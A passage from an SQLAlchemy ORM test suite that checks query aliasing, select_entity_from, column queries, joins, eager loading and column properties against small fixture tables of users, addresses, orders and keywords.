('ed', 'ed@wood.com'), ('fred', 'fred@fred.com')])
q2 = q.values(func.count(User.name))
assert next(q2) == (4,)
q2 = q.select_entity_from(sel).filter(User.id==8).values(User.name, sel.c.name, User.name)
eq_(list(q2), [('ed', 'ed', 'ed')])
# using User.xxx is alised against "sel", so this query returns nothing
q2 = q.select_entity_from(sel).\
filter(User.id==8).\
filter(User.id>sel.c.id).values(User.name, sel.c.name, User.name)
eq_(list(q2), [])
# whereas this uses users.c.xxx, is not aliased and creates a new join
q2 = q.select_entity_from(sel).\
filter(users.c.id==8).\
filter(users.c.id>sel.c.id).values(users.c.name, sel.c.name, User.name)
eq_(list(q2), [('ed', 'jack', 'jack')])
def test_alias_naming(self):
User = self.classes.User
sess = create_session()
ua = aliased(User, name="foobar")
q= sess.query(ua)
self.assert_compile(
q,
"SELECT foobar.id AS foobar_id, "
"foobar.name AS foobar_name FROM users AS foobar"
)
@testing.fails_on('mssql', 'FIXME: unknown')
def test_values_specific_order_by(self):
users, User = self.tables.users, self.classes.User
sess = create_session()
assert list(sess.query(User).values()) == list()
sel = users.select(User.id.in_([7, 8])).alias()
q = sess.query(User)
u2 = aliased(User)
q2 = q.select_entity_from(sel).\
filter(u2.id>1).\
order_by(User.id, sel.c.id, u2.id).\
values(User.name, sel.c.name, u2.name)
eq_(list(q2), [('jack', 'jack', 'jack'), ('jack', 'jack', 'ed'),
('jack', 'jack', 'fred'), ('jack', 'jack', 'chuck'),
('ed', 'ed', 'jack'), ('ed', 'ed', 'ed'),
('ed', 'ed', 'fred'), ('ed', 'ed', 'chuck')])
@testing.fails_on('mssql', 'FIXME: unknown')
@testing.fails_on('oracle',
"Oracle doesn't support boolean expressions as "
"columns")
@testing.fails_on('postgresql+pg8000',
"pg8000 parses the SQL itself before passing on "
"to PG, doesn't parse this")
@testing.fails_on('postgresql+zxjdbc',
"zxjdbc parses the SQL itself before passing on "
"to PG, doesn't parse this")
@testing.fails_on("firebird", "unknown")
def test_values_with_boolean_selects(self):
"""Tests a values clause that works with select boolean
evaluations"""
User = self.classes.User
sess = create_session()
q = sess.query(User)
q2 = q.group_by(User.name.like('%j%')).\
order_by(desc(User.name.like('%j%'))).\
values(User.name.like('%j%'), func.count(User.name.like('%j%')))
eq_(list(q2), [(True, 1), (False, 3)])
q2 = q.order_by(desc(User.name.like('%j%'))).values(User.name.like('%j%'))
eq_(list(q2), [(True,), (False,), (False,), (False,)])
def test_correlated_subquery(self):
"""test that a subquery constructed from ORM attributes doesn't leak out
those entities to the outermost query.
"""
Address, users, User = (self.classes.Address,
self.tables.users,
self.classes.User)
sess = create_session()
subq = select([func.count()]).\
where(User.id==Address.user_id).\
correlate(users).\
label('count')
# we don't want Address to be outside of the subquery here
eq_(
list(sess.query(User, subq)[0:3]),
[(User(id=7,name='jack'), 1), (User(id=8,name='ed'), 3),
(User(id=9,name='fred'), 1)]
)
# same thing without the correlate, as it should
# not be needed
subq = select([func.count()]).\
where(User.id==Address.user_id).\
label('count')
# we don't want Address to be outside of the subquery here
eq_(
list(sess.query(User, subq)[0:3]),
[(User(id=7,name='jack'), 1), (User(id=8,name='ed'), 3),
(User(id=9,name='fred'), 1)]
)
def test_column_queries(self):
Address, users, User = (self.classes.Address,
self.tables.users,
self.classes.User)
sess = create_session()
eq_(sess.query(User.name).all(), [('jack',), ('ed',), ('fred',), ('chuck',)])
sel = users.select(User.id.in_([7, 8])).alias()
q = sess.query(User.name)
q2 = q.select_entity_from(sel).all()
eq_(list(q2), [('jack',), ('ed',)])
eq_(sess.query(User.name, Address.email_address).filter(User.id==Address.user_id).all(), [
('jack', 'jack@bean.com'), ('ed', 'ed@wood.com'),
('ed', 'ed@bettyboop.com'), ('ed', 'ed@lala.com'),
('fred', 'fred@fred.com')
])
eq_(sess.query(User.name, func.count(Address.email_address)).\
outerjoin(User.addresses).group_by(User.id, User.name).\
order_by(User.id).all(),
[('jack', 1), ('ed', 3), ('fred', 1), ('chuck', 0)]
)
eq_(sess.query(User, func.count(Address.email_address)).\
outerjoin(User.addresses).group_by(User).\
order_by(User.id).all(),
[(User(name='jack',id=7), 1), (User(name='ed',id=8), 3),
(User(name='fred',id=9), 1), (User(name='chuck',id=10), 0)]
)
eq_(sess.query(func.count(Address.email_address), User).\
outerjoin(User.addresses).group_by(User).\
order_by(User.id).all(),
[(1, User(name='jack',id=7)), (3, User(name='ed',id=8)),
(1, User(name='fred',id=9)), (0, User(name='chuck',id=10))]
)
adalias = aliased(Address)
eq_(sess.query(User, func.count(adalias.email_address)).\
outerjoin(adalias, 'addresses').group_by(User).\
order_by(User.id).all(),
[(User(name='jack',id=7), 1), (User(name='ed',id=8), 3),
(User(name='fred',id=9), 1), (User(name='chuck',id=10), 0)]
)
eq_(sess.query(func.count(adalias.email_address), User).\
outerjoin(adalias, User.addresses).group_by(User).\
order_by(User.id).all(),
[(1, User(name='jack',id=7)), (3, User(name='ed',id=8)),
(1, User(name='fred',id=9)), (0, User(name='chuck',id=10))]
)
# select from aliasing + explicit aliasing
eq_(
sess.query(User, adalias.email_address, adalias.id).\
outerjoin(adalias, User.addresses).\
from_self(User, adalias.email_address).\
order_by(User.id, adalias.id).all(),
[
(User(name='jack',id=7), 'jack@bean.com'),
(User(name='ed',id=8), 'ed@wood.com'),
(User(name='ed',id=8), 'ed@bettyboop.com'),
(User(name='ed',id=8), 'ed@lala.com'),
(User(name='fred',id=9), 'fred@fred.com'),
(User(name='chuck',id=10), None)
]
)
# anon + select from aliasing
eq_(
sess.query(User).join(User.addresses, aliased=True).\
filter(Address.email_address.like('%ed%')).\
from_self().all(),
[
User(name='ed',id=8),
User(name='fred',id=9),
]
)
# test eager aliasing, with/without select_entity_from aliasing
for q in [
sess.query(User, adalias.email_address).\
outerjoin(adalias, User.addresses).\
options(joinedload(User.addresses)).\
order_by(User.id, adalias.id).limit(10),
sess.query(User, adalias.email_address, adalias.id).\
outerjoin(adalias, User.addresses).\
from_self(User, adalias.email_address).\
options(joinedload(User.addresses)).\
order_by(User.id, adalias.id).limit(10),
]:
eq_(
q.all(),
[(User(addresses=[
Address(user_id=7,email_address='jack@bean.com',id=1)],
name='jack',id=7), 'jack@bean.com'),
(User(addresses=[
Address(user_id=8,email_address='ed@wood.com',id=2),
Address(user_id=8,email_address='ed@bettyboop.com',id=3),
Address(user_id=8,email_address='ed@lala.com',id=4)],
name='ed',id=8), 'ed@wood.com'),
(User(addresses=[
Address(user_id=8,email_address='ed@wood.com',id=2),
Address(user_id=8,email_address='ed@bettyboop.com',id=3),
Address(user_id=8,email_address='ed@lala.com',id=4)],name='ed',id=8),
'ed@bettyboop.com'),
(User(addresses=[
Address(user_id=8,email_address='ed@wood.com',id=2),
Address(user_id=8,email_address='ed@bettyboop.com',id=3),
Address(user_id=8,email_address='ed@lala.com',id=4)],name='ed',id=8),
'ed@lala.com'),
(User(addresses=[Address(user_id=9,email_address='fred@fred.com',id=5)],name='fred',id=9),
'fred@fred.com'),
(User(addresses=[],name='chuck',id=10), None)]
)
def test_column_from_limited_joinedload(self):
User = self.classes.User
sess = create_session()
def go():
results = sess.query(User).limit(1).\
options(joinedload('addresses')).\
add_column(User.name).all()
eq_(results, [(User(name='jack'), 'jack')])
self.assert_sql_count(testing.db, go, 1)
@testing.fails_on("firebird", "unknown")
@testing.fails_on('postgresql+pg8000', "'type oid 705 not mapped to py type' (due to literal)")
def test_self_referential(self):
Order = self.classes.Order
sess = create_session()
oalias = aliased(Order)
for q in [
sess.query(Order, oalias).\
filter(Order.user_id==oalias.user_id).filter(Order.user_id==7).\
filter(Order.id>oalias.id).order_by(Order.id, oalias.id),
sess.query(Order, oalias).from_self().filter(Order.user_id==oalias.user_id).\
filter(Order.user_id==7).filter(Order.id>oalias.id).\
order_by(Order.id, oalias.id),
# same thing, but reversed.
sess.query(oalias, Order).from_self().filter(oalias.user_id==Order.user_id).\
filter(oalias.user_id==7).filter(Order.id<oalias.id).\
order_by(oalias.id, Order.id),
# here we go....two layers of aliasing
sess.query(Order, oalias).filter(Order.user_id==oalias.user_id).\
filter(Order.user_id==7).filter(Order.id>oalias.id).\
from_self().order_by(Order.id, oalias.id).\
limit(10).options(joinedload(Order.items)),
# gratuitous four layers
sess.query(Order, oalias).filter(Order.user_id==oalias.user_id).\
filter(Order.user_id==7).filter(Order.id>oalias.id).from_self().\
from_self().from_self().order_by(Order.id, oalias.id).\
limit(10).options(joinedload(Order.items)),
]:
eq_(
q.all(),
[
(Order(address_id=1,description='order 3',isopen=1,user_id=7,id=3),
Order(address_id=1,description='order 1',isopen=0,user_id=7,id=1)),
(Order(address_id=None,description='order 5',isopen=0,user_id=7,id=5),
Order(address_id=1,description='order 1',isopen=0,user_id=7,id=1)),
(Order(address_id=None,description='order 5',isopen=0,user_id=7,id=5),
Order(address_id=1,description='order 3',isopen=1,user_id=7,id=3))
]
)
# ensure column expressions are taken from inside the subquery, not restated at the top
q = sess.query(Order.id, Order.description, literal_column("'q'").label('foo')).\
filter(Order.description == 'order 3').from_self()
self.assert_compile(q,
"SELECT anon_1.orders_id AS "
"anon_1_orders_id, anon_1.orders_descriptio"
"n AS anon_1_orders_description, "
"anon_1.foo AS anon_1_foo FROM (SELECT "
"orders.id AS orders_id, "
"orders.description AS orders_description, "
"'q' AS foo FROM orders WHERE "
"orders.description = :description_1) AS "
"anon_1")
eq_(
q.all(),
[(3, 'order 3', 'q')]
)
def test_multi_mappers(self):
Address, addresses, users, User = (self.classes.Address,
self.tables.addresses,
self.tables.users,
self.classes.User)
test_session = create_session()
(user7, user8, user9, user10) = test_session.query(User).all()
(address1, address2, address3, address4, address5) = \
test_session.query(Address).all()
expected = [(user7, address1),
(user8, address2),
(user8, address3),
(user8, address4),
(user9, address5),
(user10, None)]
sess = create_session()
selectquery = users.outerjoin(addresses).select(use_labels=True, order_by=[users.c.id, addresses.c.id])
eq_(list(sess.query(User, Address).instances(selectquery.execute())), expected)
sess.expunge_all()
for address_entity in (Address, aliased(Address)):
q = sess.query(User).add_entity(address_entity).\
outerjoin(address_entity, 'addresses').\
order_by(User.id, address_entity.id)
eq_(q.all(), expected)
sess.expunge_all()
q = sess.query(User).add_entity(address_entity)
q = q.join(address_entity, 'addresses')
q = q.filter_by(email_address='ed@bettyboop.com')
eq_(q.all(), [(user8, address3)])
sess.expunge_all()
q = sess.query(User, address_entity).join(address_entity, 'addresses').\
filter_by(email_address='ed@bettyboop.com')
eq_(q.all(), [(user8, address3)])
sess.expunge_all()
q = sess.query(User, address_entity).join(address_entity, 'addresses').\
options(joinedload('addresses')).\
filter_by(email_address='ed@bettyboop.com')
eq_(list(util.OrderedSet(q.all())), [(user8, address3)])
sess.expunge_all()
def test_aliased_multi_mappers(self):
User, addresses, users, Address = (self.classes.User,
self.tables.addresses,
self.tables.users,
self.classes.Address)
sess = create_session()
(user7, user8, user9, user10) = sess.query(User).all()
(address1, address2, address3, address4, address5) = sess.query(Address).all()
expected = [(user7, address1),
(user8, address2),
(user8, address3),
(user8, address4),
(user9, address5),
(user10, None)]
q = sess.query(User)
adalias = addresses.alias('adalias')
q = q.add_entity(Address, alias=adalias).select_entity_from(users.outerjoin(adalias))
l = q.order_by(User.id, adalias.c.id).all()
assert l == expected
sess.expunge_all()
q = sess.query(User).add_entity(Address, alias=adalias)
l = q.select_entity_from(users.outerjoin(adalias)).filter(adalias.c.email_address=='ed@bettyboop.com').all()
assert l == [(user8, address3)]
def test_with_entities(self):
User, Address = self.classes.User, self.classes.Address
sess = create_session()
q = sess.query(User).filter(User.id==7).order_by(User.name)
self.assert_compile(
q.with_entities(User.id,Address).\
filter(Address.user_id == User.id),
'SELECT users.id AS users_id, addresses.id '
'AS addresses_id, addresses.user_id AS '
'addresses_user_id, addresses.email_address'
' AS addresses_email_address FROM users, '
'addresses WHERE users.id = :id_1 AND '
'addresses.user_id = users.id ORDER BY '
'users.name')
def test_multi_columns(self):
users, User = self.tables.users, self.classes.User
sess = create_session()
expected = [(u, u.name) for u in sess.query(User).all()]
for add_col in (User.name, users.c.name):
assert sess.query(User).add_column(add_col).all() == expected
sess.expunge_all()
assert_raises(sa_exc.InvalidRequestError, sess.query(User).add_column, object())
def test_add_multi_columns(self):
"""test that add_column accepts a FROM clause."""
users, User = self.tables.users, self.classes.User
sess = create_session()
eq_(
sess.query(User.id).add_column(users).all(),
[(7, 7, 'jack'), (8, 8, 'ed'), (9, 9, 'fred'), (10, 10, 'chuck')]
)
def test_multi_columns_2(self):
"""test aliased/nonalised joins with the usage of add_column()"""
User, Address, addresses, users = (self.classes.User,
self.classes.Address,
self.tables.addresses,
self.tables.users)
sess = create_session()
(user7, user8, user9, user10) = sess.query(User).all()
expected = [(user7, 1),
(user8, 3),
(user9, 1),
(user10, 0)
]
q = sess.query(User)
q = q.group_by(users).order_by(User.id).outerjoin('addresses').\
add_column(func.count(Address.id).label('count'))
eq_(q.all(), expected)
sess.expunge_all()
adalias = aliased(Address)
q = sess.query(User)
q = q.group_by(users).order_by(User.id).outerjoin(adalias, 'addresses').\
add_column(func.count(adalias.id).label('count'))
eq_(q.all(), expected)
sess.expunge_all()
# TODO: figure out why group_by(users) doesn't work here
s = select([users, func.count(addresses.c.id).label('count')]).\
select_from(users.outerjoin(addresses)).\
group_by(*[c for c in users.c]).order_by(User.id)
q = sess.query(User)
l = q.add_column("count").from_statement(s).all()
assert l == expected
def test_raw_columns(self):
addresses, users, User = (self.tables.addresses,
self.tables.users,
self.classes.User)
sess = create_session()
(user7, user8, user9, user10) = sess.query(User).all()
expected = [
(user7, 1, "Name:jack"),
(user8, 3, "Name:ed"),
(user9, 1, "Name:fred"),
(user10, 0, "Name:chuck")]
adalias = addresses.alias()
q = create_session().query(User).add_column(func.count(adalias.c.id))\
.add_column(("Name:" + users.c.name)).outerjoin(adalias, 'addresses')\
.group_by(users).order_by(users.c.id)
assert q.all() == expected
# test with a straight statement
s = select([users, func.count(addresses.c.id).label('count'),
("Name:" + users.c.name).label('concat')],
from_obj=[users.outerjoin(addresses)],
group_by=[c for c in users.c], order_by=[users.c.id])
q = create_session().query(User)
l = q.add_column("count").add_column("concat").from_statement(s).all()
assert l == expected
sess.expunge_all()
# test with select_entity_from()
q = create_session().query(User).add_column(func.count(addresses.c.id))\
.add_column(("Name:" + users.c.name)).select_entity_from(users.outerjoin(addresses))\
.group_by(users).order_by(users.c.id)
assert q.all() == expected
sess.expunge_all()
q = create_session().query(User).add_column(func.count(addresses.c.id))\
.add_column(("Name:" + users.c.name)).outerjoin('addresses')\
.group_by(users).order_by(users.c.id)
assert q.all() == expected
sess.expunge_all()
q = create_session().query(User).add_column(func.count(adalias.c.id))\
.add_column(("Name:" + users.c.name)).outerjoin(adalias, 'addresses')\
.group_by(users).order_by(users.c.id)
assert q.all() == expected
sess.expunge_all()
def test_expression_selectable_matches_mzero(self):
User, Address = self.classes.User, self.classes.Address
ua = aliased(User)
aa = aliased(Address)
s = create_session()
for crit, j, exp in [
(User.id + Address.id, User.addresses,
"SELECT users.id + addresses.id AS anon_1 "
"FROM users JOIN addresses ON users.id = "
"addresses.user_id"
),
(User.id + Address.id, Address.user,
"SELECT users.id + addresses.id AS anon_1 "
"FROM addresses JOIN users ON users.id = "
"addresses.user_id"
),
(Address.id + User.id, User.addresses,
"SELECT addresses.id + users.id AS anon_1 "
"FROM users JOIN addresses ON users.id = "
"addresses.user_id"
),
(User.id + aa.id, (aa, User.addresses),
"SELECT users.id + addresses_1.id AS anon_1 "
"FROM users JOIN addresses AS addresses_1 "
"ON users.id = addresses_1.user_id"
),
]:
q = s.query(crit)
mzero = q._mapper_zero()
assert mzero.mapped_table is q._entity_zero().selectable
q = q.join(j)
self.assert_compile(q, exp)
for crit, j, exp in [
(ua.id + Address.id, ua.addresses,
"SELECT users_1.id + addresses.id AS anon_1 "
"FROM users AS users_1 JOIN addresses "
"ON users_1.id = addresses.user_id"),
(ua.id + aa.id, (aa, ua.addresses),
"SELECT users_1.id + addresses_1.id AS anon_1 "
"FROM users AS users_1 JOIN addresses AS "
"addresses_1 ON users_1.id = addresses_1.user_id"),
(ua.id + aa.id, (ua, aa.user),
"SELECT users_1.id + addresses_1.id AS anon_1 "
"FROM addresses AS addresses_1 JOIN "
"users AS users_1 "
"ON users_1.id = addresses_1.user_id")
]:
q = s.query(crit)
mzero = q._mapper_zero()
assert inspect(mzero).selectable is q._entity_zero().selectable
q = q.join(j)
self.assert_compile(q, exp)
def test_aliased_adapt_on_names(self):
User, Address = self.classes.User, self.classes.Address
sess = Session()
agg_address = sess.query(Address.id,
func.sum(func.length(Address.email_address)).label('email_address')
).group_by(Address.user_id)
ag1 = aliased(Address, agg_address.subquery())
ag2 = aliased(Address, agg_address.subquery(), adapt_on_names=True)
# first, without adapt on names, 'email_address' isn't matched up - we get the raw "address"
# element in the SELECT
self.assert_compile(
sess.query(User, ag1.email_address).join(ag1, User.addresses).filter(ag1.email_address > 5),
"SELECT users.id AS users_id, users.name AS users_name, addresses.email_address "
"AS addresses_email_address FROM addresses, users JOIN "
"(SELECT addresses.id AS id, sum(length(addresses.email_address)) "
"AS email_address FROM addresses GROUP BY addresses.user_id) AS "
"anon_1 ON users.id = addresses.user_id WHERE addresses.email_address > :email_address_1"
)
# second, 'email_address' matches up to the aggreagte, and we get a smooth JOIN
# from users->subquery and that's it
self.assert_compile(
sess.query(User, ag2.email_address).join(ag2, User.addresses).filter(ag2.email_address > 5),
"SELECT users.id AS users_id, users.name AS users_name, "
"anon_1.email_address AS anon_1_email_address FROM users "
"JOIN (SELECT addresses.id AS id, sum(length(addresses.email_address)) "
"AS email_address FROM addresses GROUP BY addresses.user_id) AS "
"anon_1 ON users.id = addresses.user_id WHERE anon_1.email_address > :email_address_1",
)
class SelectFromTest(QueryTest, AssertsCompiledSQL):
run_setup_mappers = None
__dialect__ = 'default'
def test_replace_with_select(self):
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(User, users, properties = {
'addresses':relationship(Address)
})
mapper(Address, addresses)
sel = users.select(users.c.id.in_([7, 8])).alias()
sess = create_session()
eq_(sess.query(User).select_entity_from(sel).all(), [User(id=7), User(id=8)])
eq_(sess.query(User).select_entity_from(sel).filter(User.id==8).all(), [User(id=8)])
eq_(sess.query(User).select_entity_from(sel).order_by(desc(User.name)).all(), [
User(name='jack',id=7), User(name='ed',id=8)
])
eq_(sess.query(User).select_entity_from(sel).order_by(asc(User.name)).all(), [
User(name='ed',id=8), User(name='jack',id=7)
])
eq_(sess.query(User).select_entity_from(sel).options(joinedload('addresses')).first(),
User(name='jack', addresses=[Address(id=1)])
)
def test_join_mapper_order_by(self):
"""test that mapper-level order_by is adapted to a selectable."""
User, users = self.classes.User, self.tables.users
mapper(User, users, order_by=users.c.id)
sel = users.select(users.c.id.in_([7, 8]))
sess = create_session()
eq_(sess.query(User).select_entity_from(sel).all(),
[
User(name='jack',id=7), User(name='ed',id=8)
]
)
def test_differentiate_self_external(self):
"""test some different combinations of joining a table to a subquery of itself."""
users, User = self.tables.users, self.classes.User
mapper(User, users)
sess = create_session()
sel = sess.query(User).filter(User.id.in_([7, 8])).subquery()
ualias = aliased(User)
self.assert_compile(
sess.query(User).join(sel, User.id>sel.c.id),
"SELECT users.id AS users_id, users.name AS users_name FROM "
"users JOIN (SELECT users.id AS id, users.name AS name FROM "
"users WHERE users.id IN (:id_1, :id_2)) AS anon_1 ON users.id > anon_1.id",
)
self.assert_compile(
sess.query(ualias).select_entity_from(sel).filter(ualias.id>sel.c.id),
"SELECT users_1.id AS users_1_id, users_1.name AS users_1_name FROM "
"users AS users_1, (SELECT users.id AS id, users.name AS name FROM "
"users WHERE users.id IN (:id_1, :id_2)) AS anon_1 WHERE users_1.id > anon_1.id",
)
self.assert_compile(
sess.query(ualias).select_entity_from(sel).join(ualias, ualias.id>sel.c.id),
"SELECT users_1.id AS users_1_id, users_1.name AS users_1_name "
"FROM (SELECT users.id AS id, users.name AS name "
"FROM users WHERE users.id IN (:id_1, :id_2)) AS anon_1 "
"JOIN users AS users_1 ON users_1.id > anon_1.id"
)
self.assert_compile(
sess.query(ualias).select_entity_from(sel).join(ualias, ualias.id>User.id),
"SELECT users_1.id AS users_1_id, users_1.name AS users_1_name "
"FROM (SELECT users.id AS id, users.name AS name FROM "
"users WHERE users.id IN (:id_1, :id_2)) AS anon_1 "
"JOIN users AS users_1 ON anon_1.id < users_1.id"
)
salias = aliased(User, sel)
self.assert_compile(
sess.query(salias).join(ualias, ualias.id>salias.id),
"SELECT anon_1.id AS anon_1_id, anon_1.name AS anon_1_name FROM "
"(SELECT users.id AS id, users.name AS name FROM users WHERE users.id "
"IN (:id_1, :id_2)) AS anon_1 JOIN users AS users_1 ON users_1.id > anon_1.id",
)
# this one uses an explicit join(left, right, onclause) so works
self.assert_compile(
sess.query(ualias).select_entity_from(join(sel, ualias, ualias.id>sel.c.id)),
"SELECT users_1.id AS users_1_id, users_1.name AS users_1_name FROM "
"(SELECT users.id AS id, users.name AS name FROM users WHERE users.id "
"IN (:id_1, :id_2)) AS anon_1 JOIN users AS users_1 ON users_1.id > anon_1.id",
use_default_dialect=True
)
def test_aliased_class_vs_nonaliased(self):
User, users = self.classes.User, self.tables.users
mapper(User, users)
ua = aliased(User)
sess = create_session()
self.assert_compile(
sess.query(User).select_from(ua).join(User, ua.name > User.name),
"SELECT users.id AS users_id, users.name AS users_name "
"FROM users AS users_1 JOIN users ON users.name < users_1.name"
)
self.assert_compile(
sess.query(User.name).select_from(ua).join(User, ua.name > User.name),
"SELECT users.name AS users_name FROM users AS users_1 "
"JOIN users ON users.name < users_1.name"
)
self.assert_compile(
sess.query(ua.name).select_from(ua).join(User, ua.name > User.name),
"SELECT users_1.name AS users_1_name FROM users AS users_1 "
"JOIN users ON users.name < users_1.name"
)
self.assert_compile(
sess.query(ua).select_from(User).join(ua, ua.name > User.name),
"SELECT users_1.id AS users_1_id, users_1.name AS users_1_name "
"FROM users JOIN users AS users_1 ON users.name < users_1.name"
)
# this is tested in many other places here, just adding it
# here for comparison
self.assert_compile(
sess.query(User.name).\
select_entity_from(users.select().where(users.c.id > 5)),
"SELECT anon_1.name AS anon_1_name FROM (SELECT users.id AS id, "
"users.name AS name FROM users WHERE users.id > :id_1) AS anon_1"
)
def test_join_no_order_by(self):
User, users = self.classes.User, self.tables.users
mapper(User, users)
sel = users.select(users.c.id.in_([7, 8]))
sess = create_session()
eq_(sess.query(User).select_entity_from(sel).all(),
[
User(name='jack',id=7), User(name='ed',id=8)
]
)
def test_join(self):
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(User, users, properties = {
'addresses':relationship(Address)
})
mapper(Address, addresses)
sel = users.select(users.c.id.in_([7, 8]))
sess = create_session()
eq_(sess.query(User).select_entity_from(sel).join('addresses').
add_entity(Address).order_by(User.id).order_by(Address.id).all(),
[
(User(name='jack',id=7), Address(user_id=7,email_address='jack@bean.com',id=1)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@wood.com',id=2)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@bettyboop.com',id=3)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@lala.com',id=4))
]
)
adalias = aliased(Address)
eq_(sess.query(User).select_entity_from(sel).join(adalias, 'addresses').
add_entity(adalias).order_by(User.id).order_by(adalias.id).all(),
[
(User(name='jack',id=7), Address(user_id=7,email_address='jack@bean.com',id=1)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@wood.com',id=2)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@bettyboop.com',id=3)),
(User(name='ed',id=8), Address(user_id=8,email_address='ed@lala.com',id=4))
]
)
def test_more_joins(self):
users, Keyword, orders, items, order_items, Order, Item, \
User, keywords, item_keywords = (self.tables.users,
self.classes.Keyword,
self.tables.orders,
self.tables.items,
self.tables.order_items,
self.classes.Order,
self.classes.Item,
self.classes.User,
self.tables.keywords,
self.tables.item_keywords)
mapper(User, users, properties={
'orders':relationship(Order, backref='user'), # o2m, m2o
})
mapper(Order, orders, properties={
'items':relationship(Item, secondary=order_items,
order_by=items.c.id), #m2m
})
mapper(Item, items, properties={
'keywords':relationship(Keyword, secondary=item_keywords,
order_by=keywords.c.id) #m2m
})
mapper(Keyword, keywords)
sess = create_session()
sel = users.select(users.c.id.in_([7, 8]))
eq_(sess.query(User).select_entity_from(sel).\
join('orders', 'items', 'keywords').\
filter(Keyword.name.in_(['red', 'big', 'round'])).\
all(),
[
User(name='jack',id=7)
])
eq_(sess.query(User).select_entity_from(sel).\
join('orders', 'items', 'keywords', aliased=True).\
filter(Keyword.name.in_(['red', 'big', 'round'])).\
all(),
[
User(name='jack',id=7)
])
def test_very_nested_joins_with_joinedload(self):
users, Keyword, orders, items, order_items, Order, Item, \
User, keywords, item_keywords = (self.tables.users,
self.classes.Keyword,
self.tables.orders,
self.tables.items,
self.tables.order_items,
self.classes.Order,
self.classes.Item,
self.classes.User,
self.tables.keywords,
self.tables.item_keywords)
mapper(User, users, properties={
'orders':relationship(Order, backref='user'), # o2m, m2o
})
mapper(Order, orders, properties={
'items':relationship(Item, secondary=order_items,
order_by=items.c.id), #m2m
})
mapper(Item, items, properties={
'keywords':relationship(Keyword, secondary=item_keywords,
order_by=keywords.c.id) #m2m
})
mapper(Keyword, keywords)
sess = create_session()
sel = users.select(users.c.id.in_([7, 8]))
def go():
eq_(
sess.query(User).select_entity_from(sel).
options(joinedload_all('orders.items.keywords')).
join('orders', 'items', 'keywords', aliased=True).
filter(Keyword.name.in_(['red', 'big', 'round'])).\
all(),
[
User(name='jack',orders=[
Order(description='order 1',items=[
Item(description='item 1',
keywords=[
Keyword(name='red'),
Keyword(name='big'),
Keyword(name='round')
]),
Item(description='item 2',
keywords=[
Keyword(name='red',id=2),
Keyword(name='small',id=5),
Keyword(name='square')
]),
Item(description='item 3',
keywords=[
Keyword(name='green',id=3),
Keyword(name='big',id=4),
Keyword(name='round',id=6)])
]),
Order(description='order 3',items=[
Item(description='item 3',
keywords=[
Keyword(name='green',id=3),
Keyword(name='big',id=4),
Keyword(name='round',id=6)
]),
Item(description='item 4',keywords=[],id=4),
Item(description='item 5',keywords=[],id=5)
]),
Order(description='order 5',
items=[
Item(description='item 5',keywords=[])])
])
])
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
sel2 = orders.select(orders.c.id.in_([1,2,3]))
eq_(sess.query(Order).select_entity_from(sel2).\
join('items', 'keywords').\
filter(Keyword.name == 'red').\
order_by(Order.id).all(), [
Order(description='order 1',id=1),
Order(description='order 2',id=2),
])
eq_(sess.query(Order).select_entity_from(sel2).\
join('items', 'keywords', aliased=True).\
filter(Keyword.name == 'red').\
order_by(Order.id).all(), [
Order(description='order 1',id=1),
Order(description='order 2',id=2),
])
def test_replace_with_eager(self):
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(User, users, properties = {
'addresses':relationship(Address, order_by=addresses.c.id)
})
mapper(Address, addresses)
sel = users.select(users.c.id.in_([7, 8]))
sess = create_session()
def go():
eq_(sess.query(User).options(
joinedload('addresses')
).select_entity_from(sel).order_by(User.id).all(),
[
User(id=7, addresses=[Address(id=1)]),
User(id=8, addresses=[Address(id=2), Address(id=3), Address(id=4)])
]
)
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
eq_(sess.query(User).options(
joinedload('addresses')
).select_entity_from(sel).filter(User.id==8).order_by(User.id).all(),
[User(id=8, addresses=[Address(id=2), Address(id=3), Address(id=4)])]
)
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
eq_(sess.query(User).options(
joinedload('addresses')
).select_entity_from(sel).order_by(User.id)[1],
User(id=8, addresses=[Address(id=2), Address(id=3), Address(id=4)]))
self.assert_sql_count(testing.db, go, 1)
class CustomJoinTest(QueryTest):
run_setup_mappers = None
def test_double_same_mappers(self):
"""test aliasing of joins with a custom join condition"""
addresses, items, order_items, orders, Item, User, Address, Order, users = (self.tables.addresses,
self.tables.items,
self.tables.order_items,
self.tables.orders,
self.classes.Item,
self.classes.User,
self.classes.Address,
self.classes.Order,
self.tables.users)
mapper(Address, addresses)
mapper(Order, orders, properties={
'items':relationship(Item, secondary=order_items, lazy='select', order_by=items.c.id),
})
mapper(Item, items)
mapper(User, users, properties = dict(
addresses = relationship(Address, lazy='select'),
open_orders = relationship(Order, primaryjoin = and_(orders.c.isopen == 1, users.c.id==orders.c.user_id), lazy='select'),
closed_orders = relationship(Order, primaryjoin = and_(orders.c.isopen == 0, users.c.id==orders.c.user_id), lazy='select')
))
q = create_session().query(User)
eq_(
q.join('open_orders', 'items', aliased=True).filter(Item.id==4).\
join('closed_orders', 'items', aliased=True).filter(Item.id==3).all(),
[User(id=7)]
)
class ExternalColumnsTest(QueryTest):
"""test mappers with SQL-expressions added as column properties."""
run_setup_mappers = None
def test_external_columns_bad(self):
users, User = self.tables.users, self.classes.User
assert_raises_message(sa_exc.ArgumentError, "not represented in the mapper's table", mapper, User, users, properties={
'concat': (users.c.id * 2),
})
clear_mappers()
def test_external_columns(self):
"""test querying mappings that reference external columns or selectables."""
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(User, users, properties={
'concat': column_property((users.c.id * 2)),
'count': column_property(
select([func.count(addresses.c.id)], users.c.id==addresses.c.user_id).\
correlate(users).\
as_scalar())
})
mapper(Address, addresses, properties={
'user':relationship(User)
})
sess = create_session()
sess.query(Address).options(joinedload('user')).all()
eq_(sess.query(User).all(),
[
User(id=7, concat=14, count=1),
User(id=8, concat=16, count=3),
User(id=9, concat=18, count=1),
User(id=10, concat=20, count=0),
]
)
address_result = [
